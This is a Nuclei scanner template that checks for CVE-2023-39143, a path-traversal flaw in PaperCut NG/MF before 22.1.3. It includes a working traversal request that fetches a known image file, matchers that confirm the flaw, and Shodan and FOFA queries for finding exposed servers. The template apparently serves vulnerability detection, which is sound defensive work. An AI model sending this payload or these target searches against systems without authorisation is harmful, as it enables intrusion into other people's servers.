Description
PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files.
PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files.
id: CVE-2023-39143
info:
name: PaperCut < 22.1.3 - Path Traversal
author: pdteam
severity: critical
description: PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files.
impact: |
An attacker can exploit this vulnerability to access sensitive files, potentially leading to unauthorized disclosure of information or remote code execution.
remediation: |
Upgrade PaperCut to version 22.1.3 or later to mitigate the vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-39143
- https://www.horizon3.ai/cve-2023-39143-papercut-path-traversal-file-upload-rce-vulnerability/
- https://www.papercut.com/kb/Main/securitybulletinjuly2023/
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-131a
- https://github.com/nomi-sec/PoC-in-GitHub
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-39143
cwe-id: CWE-22
epss-score: 0.80623
epss-percentile: 0.99604
cpe: cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: papercut
product: papercut_mf
shodan-query:
- html:"content=\"PaperCut\""
- http.html:"papercut"
- http.html:"content=\"papercut\""
- cpe:"cpe:2.3:a:papercut:papercut_mf"
fofa-query:
- body="papercut"
- body="content=\"papercut\""
tags: cve2023,cve,lfi,papercut,vkev,intrusive,vuln
http:
- method: GET
path:
- "{{BaseURL}}/custom-report-example/..\\..\\..\\deployment\\sharp\\icons\\home-app.png"
matchers:
- type: dsl
dsl:
- content_length == 1655
- status_code == 200
- contains(to_lower(content_type), "image/png")
- contains(hex_encode(body), "89504e470d0a1a0a") # PNG file signature in hex
condition: and
# digest: 490a0046304402205b470465357faaabc4b6488d3a7d69977a4472639295fb0955c3ae9752949d4a0220668edf0b0c1c433d89efbe8b97aefa8612d3822940a69c1e6749e51e88772785:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.